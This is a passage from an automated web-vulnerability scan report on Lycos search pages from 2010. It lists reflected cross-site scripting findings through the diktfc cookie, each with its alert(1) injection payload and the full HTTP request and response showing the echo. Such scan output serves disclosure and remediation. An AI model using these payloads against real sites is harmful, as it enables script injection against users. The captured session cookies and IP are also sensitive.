P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=peoplesearch.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aea545"><script>alert(1)</script>6004c137ca9.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.370. http://peoplesearch.lycos.com/index.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /index.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d566a"%3balert(1)//48efc52aeab was submitted in the diktfc cookie. This input was echoed as d566a";alert(1)//48efc52aeab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.php HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad566a"%3balert(1)//48efc52aeab; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"peoplesearch.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad566a";alert(1)//48efc52aeab.lycos.com"
});
</script>
...[SNIP]...

1.371. http://search.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a339"><script>alert(1)</script>9a100a5a9b2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?tab=web&query=%27&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6a339"><script>alert(1)</script>9a100a5a9b2; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:24 GMT; path=/
Set-Cookie: LYCOS_SEARCH=ncif4d92tcnpmqlnmaatquk415; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=search.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6a339"><script>alert(1)</script>9a100a5a9b2.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.372. http://search.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82a1"%3balert(1)//5ed61034d11 was submitted in the diktfc cookie. This input was echoed as c82a1";alert(1)//5ed61034d11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=web&query=%27&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac82a1"%3balert(1)//5ed61034d11; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:25 GMT; path=/
Set-Cookie: LYCOS_SEARCH=587lfmk59vbrkvafqo83kut8a3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"search.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac82a1";alert(1)//5ed61034d11.lycos.com"
});
</script>
...[SNIP]...

1.373. http://search.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36a0b"%3balert(1)//178a733ee57 was submitted in the diktfc cookie. This input was echoed as 36a0b";alert(1)//178a733ee57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bootstrap.js HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A36a0b"%3balert(1)//178a733ee57; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:35:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:09 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"search.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A36a0b";alert(1)//178a733ee57.lycos.com"
});
</script>
...[SNIP]...

1.374. http://search.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6059"><script>alert(1)</script>3164d47745a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab6059"><script>alert(1)</script>3164d47745a; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:35:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:08 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=search.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab6059"><script>alert(1)</script>3164d47745a.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.375. http://search.lycos.com/default.asp [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /default.asp

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 599d1"><script>alert(1)</script>8a2ede2f521 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /default.asp HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A599d1"><script>alert(1)</script>8a2ede2f521; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=search.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A599d1"><script>alert(1)</script>8a2ede2f521.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.376. http://search.lycos.com/default.asp [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /default.asp

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2feaa"%3balert(1)//caad74f47b6 was submitted in the diktfc cookie. This input was echoed as 2feaa";alert(1)//caad74f47b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.asp HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2feaa"%3balert(1)//caad74f47b6; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:14 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"search.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2feaa";alert(1)//caad74f47b6.lycos.com"
});
</script>
...[SNIP]...

1.377. http://search.lycos.com/image/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1517b"><script>alert(1)</script>026051adaf3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /image/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1517b"><script>alert(1)</script>026051adaf3; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=search.lycos.com/image/&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1517b"><script>alert(1)</script>026051adaf3.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.378. http://search.lycos.com/image/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3332c"%3balert(1)//d09a29f118f was submitted in the diktfc cookie. This input was echoed as 3332c";alert(1)//d09a29f118f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /image/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3332c"%3balert(1)//d09a29f118f; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"search.lycos.com/image/",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3332c";alert(1)//d09a29f118f.lycos.com"
});
</script>
...[SNIP]...

1.379. http://search.lycos.com/video/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e92cb"><script>alert(1)</script>2113f4c409d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /video/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae92cb"><script>alert(1)</script>2113f4c409d; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:06 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=search.lycos.com/video/&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae92cb"><script>alert(1)</script>2113f4c409d.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.380. http://search.lycos.com/video/ [diktfc cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 184a0"%3balert(1)//a41b54937a was submitted in the diktfc cookie. This input was echoed as 184a0";alert(1)//a41b54937a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A184a0"%3balert(1)//a41b54937a; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
